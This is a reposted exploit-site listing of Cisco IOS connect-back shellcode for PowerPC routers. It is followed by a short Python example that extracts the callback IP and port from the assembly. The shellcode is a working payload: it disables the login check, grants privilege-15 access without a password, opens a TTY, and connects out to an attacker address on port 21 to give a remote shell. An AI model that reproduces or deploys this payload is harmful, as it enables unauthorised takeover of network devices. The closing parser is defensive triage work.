Cisco IOS Connectback shellcode v1.0
====================================

# ----------------------------------------------------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------
main:
    stwu 1,-48(1)
    mflr 0
    stw 31,44(1)
    stw 0,52(1)
    mr 31,1
    li 3,512
    lis 9,malloc@ha #malloc() memory for tcp structure
    la 9,malloc@l(9)
    mtctr 9
    bctrl
    mr 0,3
    stw 0,20(31)
    lwz 9,12(31)
    li 0,1
    stb 0,0(9)
    lwz 9,12(31)
    lis 0,0xac1e # connect back ip address
    ori 0,0,1018 #
    stw 0,4(9)
    li 3,66
    li 4,0
    lis 9,allocate_tty@ha # allocate new TTY
    la 9,allocate_tty@l(9)
    mtctr 9
    bctrl
    addi 0,31,24
# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################
# login patch begin
    lis 9, login@ha
    la 9, login@l(9)
    li 8,0
    stw 8, 0(9)
# login patch end
#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
    lis 9, priv@ha
    la 9, priv@l(9)
    lis 8, god@ha
    la 8, god@l(8)
    stw 8, 0(9)
# priv patch end
###########################################################
    li 3,0
    li 4,21 # Port 21 for connectback
    lwz 5,12(31)
    li 6,0
    li 7,0
    mr 8,0
    li 9,0
    lis 11,tcp_connect@ha # Connect to attacker IP
    la 11,tcp_connect@l(11)
    mtctr 11
    bctrl
    mr 0,3
    stw 0,20(31)
    li 3,66
    lwz 4,20(31)
    li 5,0
    li 6,0
    li 7,0
    li 8,0
    li 9,0
    li 10,0
    lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
    la 11,tcp_execute_command@l(11)
    mtctr 11
    bctrl
    lwz 11,0(1)
    lwz 0,4(11)
    mtlr 0
    lwz 31,-4(11)
    mr 1,11
###########################################
    lis 9, addr@ha
    addi 0, 9, addr@l
    mtctr 0
    xor 3,3,3
    addi 3,0, -2
    lis 10, str@ha
    addi 4, 10, str@l
    bctrl
    lis 10, ret@ha
    addi 4, 10, ret@l
    mtctr 4
    bctrl

# 0day.today [2024-06-03] #
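
For triage of a listing like the one above, the connect-back endpoint can be read out of the code itself: the `lis`/`ori` pair builds the 32-bit IPv4 address and `li 4,...` sets the port before the `tcp_connect` call. The Python below is an added example, not part of the original shellcode or IRM's code. Its function names are hypothetical, and it assumes, as in the listing, that the address is written with `stw ...,4(9)` and that r4 holds the port when `tcp_connect` is set up.

```python
import ipaddress
import re

# Excerpt copied from the listing above; only the lines this example needs.
LISTING = """
    lis 0,0xac1e # connect back ip address
    ori 0,0,1018 #
    stw 0,4(9)
    li 3,0
    li 4,21 # Port 21 for connectback
    lwz 5,12(31)
    lis 11,tcp_connect@ha # Connect to attacker IP
    la 11,tcp_connect@l(11)
"""

INSN = re.compile(r"^\s*(\w+)\s+([^#]*)")  # mnemonic, operands up to any comment

def parse(listing):
    """Yield (mnemonic, [operands]); comment lines, labels and directives are skipped."""
    for line in listing.splitlines():
        m = INSN.match(line)
        if m and m.group(2).strip():
            yield m.group(1), [op.strip() for op in m.group(2).split(",")]

def imm(text):
    """Return a numeric immediate, or None for symbolic or memory operands."""
    try:
        return int(text, 0)
    except ValueError:
        return None

def extract_callback(listing):
    """Track li/lis/ori immediates; return (ip, port) as set up for tcp_connect."""
    regs, ip, port = {}, None, None
    for op, a in parse(listing):
        if op == "lis" and imm(a[1]) is not None:
            regs[a[0]] = (imm(a[1]) << 16) & 0xFFFFFFFF
        elif op == "ori" and a[1] in regs and imm(a[2]) is not None:
            regs[a[0]] = regs[a[1]] | imm(a[2])
        elif op == "li":
            regs[a[0]] = imm(a[1])
        elif op == "stw" and a[1] == "4(9)" and a[0] in regs:
            ip = ipaddress.IPv4Address(regs[a[0]])  # address stored at offset 4 (assumption)
        elif op == "lis" and a[1].startswith("tcp_connect@"):
            port = regs.get("4")  # r4 holds the port when the call is set up (assumption)
    return ip, port

if __name__ == "__main__":
    print(extract_callback(LISTING))
```

On the excerpt it returns 172.30.3.250 and port 21; that address is in the private 172.16.0.0/12 range.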